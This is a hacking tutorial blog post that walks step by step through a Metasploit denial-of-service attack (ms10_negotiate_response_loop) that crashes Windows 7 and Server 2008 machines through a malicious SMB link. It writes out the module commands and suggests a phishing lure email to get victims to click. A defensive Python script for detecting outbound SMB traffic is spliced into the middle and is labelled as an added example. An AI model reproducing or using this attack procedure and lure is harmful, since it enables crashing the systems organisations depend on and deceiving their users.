In my first few articles, we focused on operating system hacks. These hacks have been primarily on older operating systems such as Windows XP, Windows Vista, and Windows Server 2003.
Although these operating systems were first released, in some cases, almost 10 years ago, they are still in wide use. I have consulted for many large corporations and institutions and am always surprised to see Windows XP systems still in use. On the other hand, I'm never surprised to see Windows Server 2003, as server operating systems get upgraded much less often.
Operating system hacks can be fun, especially when they come at the expense of that software behemoth Microsoft, but they are becoming increasingly rare as Microsoft pays more attention to security. That is one of the reasons that more and more attacks are centered upon the client-side application software instead of the OS.
Before we move on to client-side application hacks, I want to do at least one more operating system hack. Vulnerabilities still exist in the new operating systems, but they are becoming rarer and rarer. With so many vulnerabilities in client-side applications, why would you want to spend a lot of time on the OS?
In this hack, we will take advantage of a flaw in Windows 7 and Windows Server 2008 operating systems that will create an infinite loop and crash the system. Although this isn't nearly as much fun as owning the system, it can be very destructive to an institution that relies upon this system to run their organization.
Enough talk, let's get started. Fire up Metasploit on BackTrack 5 and let's hack! If you're new to Metasploit, check out my article on getting started with it, as well as some of the past hacks.
Remember that Metasploit has six types of modules: exploits, payloads, auxiliary, encoders, NOPs and post. In this hack, we will use an auxiliary module to attack the SMB client on a Windows 7 or Windows Server 2008 system.
msf > use auxiliary/dos/windows/smb/ms10_negotiate_response_loop
Now that we have selected our module, let's look at our options:
msf auxiliary(ms10_negotiate_response_loop) > show options
As we can see in the screenshot below, the only option we need to set is SRVHOST, which is our own (the attacker's) system. In my case, it is 192.168.1.100. Yours may be different; check your IP address by typing ifconfig in a terminal.
Next, set your SRVHOST by typing:
msf auxiliary(ms10_negotiate_response_loop) > set SRVHOST 192.168.1.100
In the last step, we run the auxiliary module. Once it executes, it generates a shared-folder (UNC) link that you can send to the target machine; in this case, the link is \\192.168.1.100\Shared\Anything.
msf auxiliary(ms10_negotiate_response_loop) > run
Metasploit then starts the malicious SMB service, and when the target clicks on the link, the target system enters an infinite loop, freezes, and crashes.
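The link above only does damage if the victim host can reach the attacker's SMB server, so on the defender's side the standard mitigation is to block outbound TCP 139/445 at the perimeter and alert on any attempt. The following Python script is an added example, not part of the original article or of Metasploit: it scans constructed firewall log lines (the log format and the internal address ranges are assumptions) and reports internal hosts connecting to SMB ports on external addresses, which is exactly the traffic a client following an external UNC path would produce.

```python
import ipaddress
import re

# Constructed sample perimeter firewall log lines (not from the article).
# Format: "<timestamp> ACCEPT|DROP proto=<proto> src=<ip>:<port> dst=<ip>:<port>"
SAMPLE_LOG = """\
2012-03-01T10:00:01 ACCEPT proto=tcp src=10.0.5.23:51234 dst=10.0.1.7:445
2012-03-01T10:00:04 ACCEPT proto=tcp src=10.0.5.23:51240 dst=203.0.113.45:445
2012-03-01T10:00:05 ACCEPT proto=tcp src=10.0.5.23:51241 dst=203.0.113.45:80
2012-03-01T10:00:09 DROP proto=tcp src=10.0.7.9:51300 dst=198.51.100.8:139
2012-03-01T10:00:12 ACCEPT proto=udp src=10.0.5.23:51250 dst=203.0.113.53:53
"""

SMB_PORTS = {139, 445}
# Assumed internal ranges (RFC 1918); adjust to your own address plan.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ACCEPT|DROP)\s+proto=(?P<proto>\w+)\s+"
    r"src=(?P<src>[\d.]+):(?P<sport>\d+)\s+dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec

def is_internal(ip):
    """True if the address falls inside one of the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def find_egress_smb(log_text):
    """Return (ts, src, dst, dport, action) for each TCP connection from an internal
    host to an SMB port on an external host. ACCEPTed hits mean the perimeter block
    is missing; DROPped hits still identify a client that tried to follow an
    external UNC path and is worth a look."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "tcp" or rec["dport"] not in SMB_PORTS:
            continue
        if is_internal(rec["src"]) and not is_internal(rec["dst"]):
            hits.append((rec["ts"], rec["src"], rec["dst"], rec["dport"], rec["action"]))
    return hits

if __name__ == "__main__":
    for ts, src, dst, port, action in find_egress_smb(SAMPLE_LOG):
        print(f"{ts} {action}: {src} -> {dst}:{port} (outbound SMB to external host)")
```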
To make the link look safe and more inviting, we might craft a webpage and attach this link to it, or send the link in an email that says something like "Hey, check out this sick video!" When the victim clicks on the link to view the "video", their system crashes.
In my next few hacks, we will start looking at attacking the many vulnerable client-side applications. Happy hacking!